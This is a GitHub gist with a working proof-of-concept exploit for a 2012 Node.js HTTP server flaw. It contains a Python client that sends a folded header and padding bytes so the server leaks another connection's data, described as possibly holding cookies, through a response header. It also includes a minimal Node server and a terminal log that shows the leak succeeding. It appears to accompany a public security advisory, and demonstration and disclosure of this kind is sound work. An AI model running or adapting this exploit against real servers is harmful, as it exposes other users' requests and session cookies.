public
Created

  • Download Gist
stringptr-update-poc-client.py
Python
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
#!/usr/bin/env python
 
import socket
import sys
import time
 
def round_up(n, r):
return int((n + r - 1) / r) * r
 
s = socket.socket()
s.connect(("localhost", 8080))
 
buf = "GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\nX:\r\n "
s.sendall(buf)
time.sleep(0.1)
 
s2 = socket.socket()
s2.connect(("localhost", 8080))
 
buf2 = "This is private data, perhaps an HTTP request with a Cookie in it."
s2.sendall(buf2)
time.sleep(0.1)
 
s.sendall("A" * (3 + round_up(len(buf), 16) - len(buf) + round_up(len(buf2), 16)) + "\r\n\r\n")
 
while True:
b = s.recv(1024)
if not b:
break
sys.stdout.write(b)
stringptr-update-poc-server.js
JavaScript
1 2 3 4 5 6 7 8
#!/usr/bin/env node
 
var http = require('http');
 
http.createServer(function (req, res) {
res.writeHead(200, {'Content-Type': 'text/plain'});
res.end('X header: ' + req.headers['x']);
}).listen(8080);

See http://blog.nodejs.org/2012/05/07/http-server-security-vulnerability-please-upgrade-to-0-6-17/

$ ./node ~/stringptr-update-poc-server.js &
[1] 11801
$ ~/stringptr-update-poc-client.py
HTTP/1.1 200 OK
Content-Type: text/plain
Date: Wed, 18 Apr 2012 00:05:11 GMT
Connection: close
Transfer-Encoding: chunked

64
X header:
 This is private data, perhaps an HTTP request with a Cookie in it.
0

Please sign in to comment on this gist.

Something went wrong with that request. Please try again.